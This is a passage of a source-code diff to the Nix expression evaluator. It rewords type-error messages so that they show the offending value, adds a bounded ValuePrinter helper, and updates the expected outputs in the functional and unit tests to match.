env, Expr * e, Value & v, const PosIdx po try { e->eval(*this, env, v); if (v.type() != nAttrs) - error("value is %1% while a set was expected", showType(v)).withFrame(env, *e).debugThrow(); + error("expected a set but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions)) + .withFrame(env, *e).debugThrow(); } catch (Error & e) { e.addTrace(positions[pos], errorCtx); throw; @@ -2076,7 +2083,10 @@ NixInt EvalState::forceInt(Value & v, const PosIdx pos, std::string_view errorCt try { forceValue(v, pos); if (v.type() != nInt) - error("value is %1% while an integer was 
expected", showType(v)).debugThrow(); + error("expected an integer but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions)) + .debugThrow(); return v.integer; } catch (Error & e) { e.addTrace(positions[pos], errorCtx); @@ -2092,7 +2102,10 @@ NixFloat EvalState::forceFloat(Value & v, const PosIdx pos, std::string_view err if (v.type() == nInt) return v.integer; else if (v.type() != nFloat) - error("value is %1% while a float was expected", showType(v)).debugThrow(); + error("expected a float but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions)) + .debugThrow(); return v.fpoint; } catch (Error & e) { e.addTrace(positions[pos], errorCtx); @@ -2106,7 +2119,10 @@ bool EvalState::forceBool(Value & v, const PosIdx pos, std::string_view errorCtx try { forceValue(v, pos); if (v.type() != nBool) - error("value is %1% while a Boolean was expected", showType(v)).debugThrow(); + error("expected a Boolean but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions)) + .debugThrow(); return v.boolean; } catch (Error & e) { e.addTrace(positions[pos], errorCtx); @@ -2126,7 +2142,10 @@ void EvalState::forceFunction(Value & v, const PosIdx pos, std::string_view erro try { forceValue(v, pos); if (v.type() != nFunction && !isFunctor(v)) - error("value is %1% while a function was expected", showType(v)).debugThrow(); + error("expected a function but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions)) + .debugThrow(); } catch (Error & e) { e.addTrace(positions[pos], errorCtx); throw; @@ -2139,7 +2158,10 @@ std::string_view EvalState::forceString(Value & v, const PosIdx pos, std::string try { forceValue(v, pos); if (v.type() != nString) - error("value is %1% while a string was expected", showType(v)).debugThrow(); + error("expected a string but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions)) + .debugThrow(); return v.string_view(); } catch (Error & e) { 
e.addTrace(positions[pos], errorCtx); diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index c08aea898..5032e95cc 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -997,7 +997,7 @@ static void prim_trace(EvalState & state, const PosIdx pos, Value * * args, Valu if (args[0]->type() == nString) printError("trace: %1%", args[0]->string_view()); else - printError("trace: %1%", printValue(state, *args[0])); + printError("trace: %1%", ValuePrinter(state, *args[0])); state.forceValue(*args[1], pos); v = *args[1]; } diff --git a/src/libexpr/print-ambiguous.cc b/src/libexpr/print-ambiguous.cc index 07c398dd2..521250cec 100644 --- a/src/libexpr/print-ambiguous.cc +++ b/src/libexpr/print-ambiguous.cc @@ -1,6 +1,7 @@ #include "print-ambiguous.hh" #include "print.hh" #include "signals.hh" +#include "eval.hh" namespace nix { diff --git a/src/libexpr/print-options.hh b/src/libexpr/print-options.hh index 11ff9ae87..aba2eaeae 100644 --- a/src/libexpr/print-options.hh +++ b/src/libexpr/print-options.hh @@ -49,4 +49,16 @@ struct PrintOptions size_t maxStringLength = std::numeric_limits::max(); }; +/** + * `PrintOptions` for unknown and therefore potentially large values in error messages, + * to avoid printing "too much" output. 
+ */ +static PrintOptions errorPrintOptions = PrintOptions { + .ansiColors = true, + .maxDepth = 10, + .maxAttrs = 10, + .maxListItems = 10, + .maxStringLength = 1024 +}; + } diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index db26ed4c2..dad6dc9ad 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -7,6 +7,7 @@ #include "store-api.hh" #include "terminal.hh" #include "english.hh" +#include "eval.hh" namespace nix { @@ -501,4 +502,10 @@ void printValue(EvalState & state, std::ostream & output, Value & v, PrintOption Printer(output, state, options).print(v); } +std::ostream & operator<<(std::ostream & output, const ValuePrinter & printer) +{ + printValue(printer.state, output, printer.value, printer.options); + return output; +} + } diff --git a/src/libexpr/print.hh b/src/libexpr/print.hh index 40207d777..a8300264a 100644 --- a/src/libexpr/print.hh +++ b/src/libexpr/print.hh @@ -9,11 +9,13 @@ #include -#include "eval.hh" #include "print-options.hh" namespace nix { +class EvalState; +struct Value; + /** * Print a string as a Nix string literal. * @@ -59,4 +61,21 @@ std::ostream & printIdentifier(std::ostream & o, std::string_view s); void printValue(EvalState & state, std::ostream & str, Value & v, PrintOptions options = PrintOptions {}); +/** + * A partially-applied form of `printValue` which can be formatted using `<<` + * without allocating an intermediate string. 
+ */ +class ValuePrinter { + friend std::ostream & operator << (std::ostream & output, const ValuePrinter & printer); +private: + EvalState & state; + Value & value; + PrintOptions options; + +public: + ValuePrinter(EvalState & state, Value & value, PrintOptions options = PrintOptions {}) + : state(state), value(value), options(options) { } +}; + +std::ostream & operator<<(std::ostream & output, const ValuePrinter & printer); } diff --git a/src/libutil/error.cc b/src/libutil/error.cc index bd2f6b840..1f0cb08c9 100644 --- a/src/libutil/error.cc +++ b/src/libutil/error.cc @@ -335,7 +335,7 @@ std::ostream & showErrorInfo(std::ostream & out, const ErrorInfo & einfo, bool s * try { * e->eval(*this, env, v); * if (v.type() != nAttrs) - * throwTypeError("value is %1% while a set was expected", v); + * throwTypeError("expected a set but found %1%", v); * } catch (Error & e) { * e.addTrace(pos, errorCtx); * throw; @@ -349,7 +349,7 @@ std::ostream & showErrorInfo(std::ostream & out, const ErrorInfo & einfo, bool s * e->eval(*this, env, v); * try { * if (v.type() != nAttrs) - * throwTypeError("value is %1% while a set was expected", v); + * throwTypeError("expected a set but found %1%", v); * } catch (Error & e) { * e.addTrace(pos, errorCtx); * throw; diff --git a/src/nix/eval.cc b/src/nix/eval.cc index b34af34e0..a89fa7412 100644 --- a/src/nix/eval.cc +++ b/src/nix/eval.cc @@ -121,7 +121,7 @@ struct CmdEval : MixJSON, InstallableValueCommand, MixReadOnlyOption else { state->forceValueDeep(*v); - logger->cout("%s", printValue(*state, *v)); + logger->cout("%s", ValuePrinter(*state, *v, PrintOptions { .force = true })); } } }; diff --git a/tests/functional/dyn-drv/eval-outputOf.sh b/tests/functional/dyn-drv/eval-outputOf.sh index 9467feb8d..3681bd098 100644 --- a/tests/functional/dyn-drv/eval-outputOf.sh +++ b/tests/functional/dyn-drv/eval-outputOf.sh @@ -14,7 +14,7 @@ nix --experimental-features 'nix-command' eval --impure --expr \ # resolve first. 
Adding a test so we don't liberalise it by accident. expectStderr 1 nix --experimental-features 'nix-command dynamic-derivations' eval --impure --expr \ 'builtins.outputOf (import ../dependencies.nix {}) "out"' \ - | grepQuiet "value is a set while a string was expected" + | grepQuiet "expected a string but found a set" # Test that "DrvDeep" string contexts are not supported at this time # diff --git a/tests/functional/lang/eval-fail-attr-name-type.err.exp b/tests/functional/lang/eval-fail-attr-name-type.err.exp index 23cceb58a..c8d56ba7d 100644 --- a/tests/functional/lang/eval-fail-attr-name-type.err.exp +++ b/tests/functional/lang/eval-fail-attr-name-type.err.exp @@ -13,4 +13,4 @@ error: | ^ 8| - error: value is an integer while a string was expected + error: expected a string but found an integer: 1 diff --git a/tests/functional/lang/eval-fail-call-primop.err.exp b/tests/functional/lang/eval-fail-call-primop.err.exp index ae5b55ed4..0c6f614e8 100644 --- a/tests/functional/lang/eval-fail-call-primop.err.exp +++ b/tests/functional/lang/eval-fail-call-primop.err.exp @@ -7,4 +7,4 @@ error: … while evaluating the first argument passed to builtins.length - error: value is an integer while a list was expected + error: expected a list but found an integer: 1 diff --git a/tests/functional/lang/eval-fail-list.err.exp b/tests/functional/lang/eval-fail-list.err.exp index 4320fc022..d492f8bd2 100644 --- a/tests/functional/lang/eval-fail-list.err.exp +++ b/tests/functional/lang/eval-fail-list.err.exp @@ -5,4 +5,4 @@ error: | ^ 2| - error: value is an integer while a list was expected + error: expected a list but found an integer: 8 diff --git a/tests/functional/lang/eval-fail-set-override.err.exp b/tests/functional/lang/eval-fail-set-override.err.exp index 71481683d..9006ca4e6 100644 --- a/tests/functional/lang/eval-fail-set-override.err.exp +++ b/tests/functional/lang/eval-fail-set-override.err.exp @@ -1,4 +1,4 @@ error: … while evaluating the `__overrides` attribute - 
error: value is an integer while a set was expected + error: expected a set but found an integer: 1 diff --git a/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp b/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp index 0a4f56ac5..94784c651 100644 --- a/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp +++ b/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp @@ -6,4 +6,4 @@ error: | ^ 6| - error: value is a set while a string was expected + error: expected a string but found a set: { } diff --git a/tests/unit/libexpr/error_traces.cc b/tests/unit/libexpr/error_traces.cc index 81498f65a..f0cad58bb 100644 --- a/tests/unit/libexpr/error_traces.cc +++ b/tests/unit/libexpr/error_traces.cc @@ -105,7 +105,7 @@ namespace nix { TEST_F(ErrorTraceTest, genericClosure) { ASSERT_TRACE2("genericClosure 1", TypeError, - hintfmt("value is %s while a set was expected", "an integer"), + hintfmt("expected a set but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.genericClosure")); ASSERT_TRACE2("genericClosure {}", @@ -115,22 +115,22 @@ namespace nix { ASSERT_TRACE2("genericClosure { startSet = 1; }", TypeError, - hintfmt("value is %s while a list was expected", "an integer"), + hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the 'startSet' attribute passed as argument to builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = true; }", TypeError, - hintfmt("value is %s while a function was expected", "a Boolean"), + hintfmt("expected a function but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), hintfmt("while evaluating the 'operator' attribute passed as argument to builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = item: true; }", TypeError, - hintfmt("value is %s while a list was expected", "a 
Boolean"), + hintfmt("expected a list but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), hintfmt("while evaluating the return value of the `operator` passed to builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = item: [ true ]; }", TypeError, - hintfmt("value is %s while a set was expected", "a Boolean"), + hintfmt("expected a set but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), hintfmt("while evaluating one of the elements generated by (or initially passed to) builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = item: [ {} ]; }", @@ -145,7 +145,7 @@ namespace nix { ASSERT_TRACE2("genericClosure { startSet = [ true ]; operator = item: [{ key = ''a''; }]; }", TypeError, - hintfmt("value is %s while a set was expected", "a Boolean"), + hintfmt("expected a set but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), hintfmt("while evaluating one of the elements generated by (or initially passed to) builtins.genericClosure")); } @@ -154,12 +154,12 @@ namespace nix { TEST_F(ErrorTraceTest, replaceStrings) { ASSERT_TRACE2("replaceStrings 0 0 {}", TypeError, - hintfmt("value is %s while a list was expected", "an integer"), + hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "0" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.replaceStrings")); ASSERT_TRACE2("replaceStrings [] 0 {}", TypeError, - hintfmt("value is %s while a list was expected", "an integer"), + hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "0" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.replaceStrings")); ASSERT_TRACE1("replaceStrings [ 0 ] [] {}", @@ -168,17 +168,17 @@ namespace nix { ASSERT_TRACE2("replaceStrings [ 1 ] [ \"new\" ] {}", TypeError, - hintfmt("value is %s while a string was expected", "an integer"), + hintfmt("expected a string but found %s: %s", "an integer", 
ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating one of the strings to replace passed to builtins.replaceStrings")); ASSERT_TRACE2("replaceStrings [ \"oo\" ] [ true ] \"foo\"", TypeError, - hintfmt("value is %s while a string was expected", "a Boolean"), + hintfmt("expected a string but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), hintfmt("while evaluating one of the replacement strings passed to builtins.replaceStrings")); ASSERT_TRACE2("replaceStrings [ \"old\" ] [ \"new\" ] {}", TypeError, - hintfmt("value is %s while a string was expected", "a set"), + hintfmt("expected a string but found %s: %s", "a set", "{ }"), hintfmt("while evaluating the third argument passed to builtins.replaceStrings")); } @@ -243,7 +243,7 @@ namespace nix { TEST_F(ErrorTraceTest, ceil) { ASSERT_TRACE2("ceil \"foo\"", TypeError, - hintfmt("value is %s while a float was expected", "a string"), + hintfmt("expected a float but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.ceil")); } @@ -252,7 +252,7 @@ namespace nix { TEST_F(ErrorTraceTest, floor) { ASSERT_TRACE2("floor \"foo\"", TypeError, - hintfmt("value is %s while a float was expected", "a string"), + hintfmt("expected a float but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.floor")); } @@ -265,7 +265,7 @@ namespace nix { TEST_F(ErrorTraceTest, getEnv) { ASSERT_TRACE2("getEnv [ ]", TypeError, - hintfmt("value is %s while a string was expected", "a list"), + hintfmt("expected a string but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.getEnv")); } @@ -286,7 +286,7 @@ namespace nix { TEST_F(ErrorTraceTest, placeholder) { ASSERT_TRACE2("placeholder []", TypeError, - hintfmt("value is %s while a string was expected", "a list"), + hintfmt("expected a string but found %s: %s", "a list", "[ ]"), hintfmt("while 
evaluating the first argument passed to builtins.placeholder")); } @@ -387,7 +387,7 @@ namespace nix { ASSERT_TRACE2("filterSource [] ./.", TypeError, - hintfmt("value is %s while a function was expected", "a list"), + hintfmt("expected a function but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.filterSource")); // Usupported by store "dummy" @@ -399,7 +399,7 @@ namespace nix { // ASSERT_TRACE2("filterSource (_: _: 1) ./.", // TypeError, - // hintfmt("value is %s while a Boolean was expected", "an integer"), + // hintfmt("expected a Boolean but found %s: %s", "an integer", "1"), // hintfmt("while evaluating the return value of the path filter function")); } @@ -412,7 +412,7 @@ namespace nix { TEST_F(ErrorTraceTest, attrNames) { ASSERT_TRACE2("attrNames []", TypeError, - hintfmt("value is %s while a set was expected", "a list"), + hintfmt("expected a set but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the argument passed to builtins.attrNames")); } @@ -421,7 +421,7 @@ namespace nix { TEST_F(ErrorTraceTest, attrValues) { ASSERT_TRACE2("attrValues []", TypeError, - hintfmt("value is %s while a set was expected", "a list"), + hintfmt("expected a set but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the argument passed to builtins.attrValues")); } @@ -430,12 +430,12 @@ namespace nix { TEST_F(ErrorTraceTest, getAttr) { ASSERT_TRACE2("getAttr [] []", TypeError, - hintfmt("value is %s while a string was expected", "a list"), + hintfmt("expected a string but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.getAttr")); ASSERT_TRACE2("getAttr \"foo\" []", TypeError, - hintfmt("value is %s while a set was expected", "a list"), + hintfmt("expected a set but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the second argument passed to builtins.getAttr")); ASSERT_TRACE2("getAttr \"foo\" {}", @@ -453,12 +453,12 @@ namespace nix { 
TEST_F(ErrorTraceTest, hasAttr) { ASSERT_TRACE2("hasAttr [] []", TypeError, - hintfmt("value is %s while a string was expected", "a list"), + hintfmt("expected a string but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.hasAttr")); ASSERT_TRACE2("hasAttr \"foo\" []", TypeError, - hintfmt("value is %s while a set was expected", "a list"), + hintfmt("expected a set but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the second argument passed to builtins.hasAttr")); } @@ -471,17 +471,17 @@ namespace nix { TEST_F(ErrorTraceTest, removeAttrs) { ASSERT_TRACE2("removeAttrs \"\" \"\"", TypeError, - hintfmt("value is %s while a set was expected", "a string"), + hintfmt("expected a set but found %s: %s", "a string", ANSI_MAGENTA "\"\"" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.removeAttrs")); ASSERT_TRACE2("removeAttrs \"\" [ 1 ]", TypeError, - hintfmt("value is %s while a set was expected", "a string"), + hintfmt("expected a set but found %s: %s", "a string", ANSI_MAGENTA "\"\"" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.removeAttrs")); ASSERT_TRACE2("removeAttrs \"\" [ \"1\" ]", TypeError, - hintfmt("value is %s while a set was expected", "a string"), + hintfmt("expected a set but found %s: %s", "a string", ANSI_MAGENTA "\"\"" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.removeAttrs")); } @@ -490,12 +490,12 @@ namespace nix { TEST_F(ErrorTraceTest, listToAttrs) { ASSERT_TRACE2("listToAttrs 1", TypeError, - hintfmt("value is %s while a list was expected", "an integer"), + hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the argument passed to builtins.listToAttrs")); ASSERT_TRACE2("listToAttrs [ 1 ]", TypeError, - hintfmt("value is %s while a set was expected", "an integer"), + hintfmt("expected a set but found %s: %s", "an integer", ANSI_CYAN "1" 
ANSI_NORMAL), hintfmt("while evaluating an element of the list passed to builtins.listToAttrs")); ASSERT_TRACE2("listToAttrs [ {} ]", @@ -505,7 +505,7 @@ namespace nix { ASSERT_TRACE2("listToAttrs [ { name = 1; } ]", TypeError, - hintfmt("value is %s while a string was expected", "an integer"), + hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the `name` attribute of an element of the list passed to builtins.listToAttrs")); ASSERT_TRACE2("listToAttrs [ { name = \"foo\"; } ]", @@ -519,12 +519,12 @@ namespace nix { TEST_F(ErrorTraceTest, intersectAttrs) { ASSERT_TRACE2("intersectAttrs [] []", TypeError, - hintfmt("value is %s while a set was expected", "a list"), + hintfmt("expected a set but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.intersectAttrs")); ASSERT_TRACE2("intersectAttrs {} []", TypeError, - hintfmt("value is %s while a set was expected", "a list"), + hintfmt("expected a set but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the second argument passed to builtins.intersectAttrs")); } @@ -533,22 +533,22 @@ namespace nix { TEST_F(ErrorTraceTest, catAttrs) { ASSERT_TRACE2("catAttrs [] {}", TypeError, - hintfmt("value is %s while a string was expected", "a list"), + hintfmt("expected a string but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.catAttrs")); ASSERT_TRACE2("catAttrs \"foo\" {}", TypeError, - hintfmt("value is %s while a list was expected", "a set"), + hintfmt("expected a list but found %s: %s", "a set", "{ }"), hintfmt("while evaluating the second argument passed to builtins.catAttrs")); ASSERT_TRACE2("catAttrs \"foo\" [ 1 ]", TypeError, - hintfmt("value is %s while a set was expected", "an integer"), + hintfmt("expected a set but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating an element in the list passed as second argument to 
builtins.catAttrs")); ASSERT_TRACE2("catAttrs \"foo\" [ { foo = 1; } 1 { bar = 5;} ]", TypeError, - hintfmt("value is %s while a set was expected", "an integer"), + hintfmt("expected a set but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating an element in the list passed as second argument to builtins.catAttrs")); } @@ -565,7 +565,7 @@ namespace nix { TEST_F(ErrorTraceTest, mapAttrs) { ASSERT_TRACE2("mapAttrs [] []", TypeError, - hintfmt("value is %s while a set was expected", "a list"), + hintfmt("expected a set but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the second argument passed to builtins.mapAttrs")); // XXX: defered @@ -590,12 +590,12 @@ namespace nix { TEST_F(ErrorTraceTest, zipAttrsWith) { ASSERT_TRACE2("zipAttrsWith [] [ 1 ]", TypeError, - hintfmt("value is %s while a function was expected", "a list"), + hintfmt("expected a function but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.zipAttrsWith")); ASSERT_TRACE2("zipAttrsWith (_: 1) [ 1 ]", TypeError, - hintfmt("value is %s while a set was expected", "an integer"), + hintfmt("expected a set but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating a value of the list passed as second argument to builtins.zipAttrsWith")); // XXX: How to properly tell that the fucntion takes two arguments ? 
@@ -622,7 +622,7 @@ namespace nix { TEST_F(ErrorTraceTest, elemAt) { ASSERT_TRACE2("elemAt \"foo\" (-1)", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.elemAt")); ASSERT_TRACE1("elemAt [] (-1)", @@ -639,7 +639,7 @@ namespace nix { TEST_F(ErrorTraceTest, head) { ASSERT_TRACE2("head 1", TypeError, - hintfmt("value is %s while a list was expected", "an integer"), + hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.elemAt")); ASSERT_TRACE1("head []", @@ -652,7 +652,7 @@ namespace nix { TEST_F(ErrorTraceTest, tail) { ASSERT_TRACE2("tail 1", TypeError, - hintfmt("value is %s while a list was expected", "an integer"), + hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.tail")); ASSERT_TRACE1("tail []", @@ -665,12 +665,12 @@ namespace nix { TEST_F(ErrorTraceTest, map) { ASSERT_TRACE2("map 1 \"foo\"", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.map")); ASSERT_TRACE2("map 1 [ 1 ]", TypeError, - hintfmt("value is %s while a function was expected", "an integer"), + hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.map")); } @@ -679,17 +679,17 @@ namespace nix { TEST_F(ErrorTraceTest, filter) { ASSERT_TRACE2("filter 1 \"foo\"", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), 
hintfmt("while evaluating the second argument passed to builtins.filter")); ASSERT_TRACE2("filter 1 [ \"foo\" ]", TypeError, - hintfmt("value is %s while a function was expected", "an integer"), + hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.filter")); ASSERT_TRACE2("filter (_: 5) [ \"foo\" ]", TypeError, - hintfmt("value is %s while a Boolean was expected", "an integer"), + hintfmt("expected a Boolean but found %s: %s", "an integer", ANSI_CYAN "5" ANSI_NORMAL), hintfmt("while evaluating the return value of the filtering function passed to builtins.filter")); } @@ -698,7 +698,7 @@ namespace nix { TEST_F(ErrorTraceTest, elem) { ASSERT_TRACE2("elem 1 \"foo\"", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.elem")); } @@ -707,17 +707,17 @@ namespace nix { TEST_F(ErrorTraceTest, concatLists) { ASSERT_TRACE2("concatLists 1", TypeError, - hintfmt("value is %s while a list was expected", "an integer"), + hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.concatLists")); ASSERT_TRACE2("concatLists [ 1 ]", TypeError, - hintfmt("value is %s while a list was expected", "an integer"), + hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating a value of the list passed to builtins.concatLists")); ASSERT_TRACE2("concatLists [ [1] \"foo\" ]", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating a value of the list passed to builtins.concatLists")); } @@ -726,12 +726,12 @@ namespace nix { 
TEST_F(ErrorTraceTest, length) { ASSERT_TRACE2("length 1", TypeError, - hintfmt("value is %s while a list was expected", "an integer"), + hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.length")); ASSERT_TRACE2("length \"foo\"", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.length")); } @@ -740,12 +740,12 @@ namespace nix { TEST_F(ErrorTraceTest, foldlPrime) { ASSERT_TRACE2("foldl' 1 \"foo\" true", TypeError, - hintfmt("value is %s while a function was expected", "an integer"), + hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.foldlStrict")); ASSERT_TRACE2("foldl' (_: 1) \"foo\" true", TypeError, - hintfmt("value is %s while a list was expected", "a Boolean"), + hintfmt("expected a list but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), hintfmt("while evaluating the third argument passed to builtins.foldlStrict")); ASSERT_TRACE1("foldl' (_: 1) \"foo\" [ true ]", @@ -754,7 +754,7 @@ namespace nix { ASSERT_TRACE2("foldl' (a: b: a && b) \"foo\" [ true ]", TypeError, - hintfmt("value is %s while a Boolean was expected", "a string"), + hintfmt("expected a Boolean but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("in the left operand of the AND (&&) operator")); } @@ -763,17 +763,17 @@ namespace nix { TEST_F(ErrorTraceTest, any) { ASSERT_TRACE2("any 1 \"foo\"", TypeError, - hintfmt("value is %s while a function was expected", "an integer"), + hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.any")); ASSERT_TRACE2("any (_: 1) \"foo\"", 
TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.any")); ASSERT_TRACE2("any (_: 1) [ \"foo\" ]", TypeError, - hintfmt("value is %s while a Boolean was expected", "an integer"), + hintfmt("expected a Boolean but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the return value of the function passed to builtins.any")); } @@ -782,17 +782,17 @@ namespace nix { TEST_F(ErrorTraceTest, all) { ASSERT_TRACE2("all 1 \"foo\"", TypeError, - hintfmt("value is %s while a function was expected", "an integer"), + hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.all")); ASSERT_TRACE2("all (_: 1) \"foo\"", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.all")); ASSERT_TRACE2("all (_: 1) [ \"foo\" ]", TypeError, - hintfmt("value is %s while a Boolean was expected", "an integer"), + hintfmt("expected a Boolean but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the return value of the function passed to builtins.all")); } @@ -801,12 +801,12 @@ namespace nix { TEST_F(ErrorTraceTest, genList) { ASSERT_TRACE2("genList 1 \"foo\"", TypeError, - hintfmt("value is %s while an integer was expected", "a string"), + hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.genList")); ASSERT_TRACE2("genList 1 2", TypeError, - hintfmt("value is %s while a function was expected", "an integer"), + hintfmt("expected a function but found %s: %s", "an integer", 
ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.genList", "an integer")); // XXX: defered @@ -825,12 +825,12 @@ namespace nix { TEST_F(ErrorTraceTest, sort) { ASSERT_TRACE2("sort 1 \"foo\"", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.sort")); ASSERT_TRACE2("sort 1 [ \"foo\" ]", TypeError, - hintfmt("value is %s while a function was expected", "an integer"), + hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.sort")); ASSERT_TRACE1("sort (_: 1) [ \"foo\" \"bar\" ]", @@ -839,7 +839,7 @@ namespace nix { ASSERT_TRACE2("sort (_: _: 1) [ \"foo\" \"bar\" ]", TypeError, - hintfmt("value is %s while a Boolean was expected", "an integer"), + hintfmt("expected a Boolean but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the return value of the sorting function passed to builtins.sort")); // 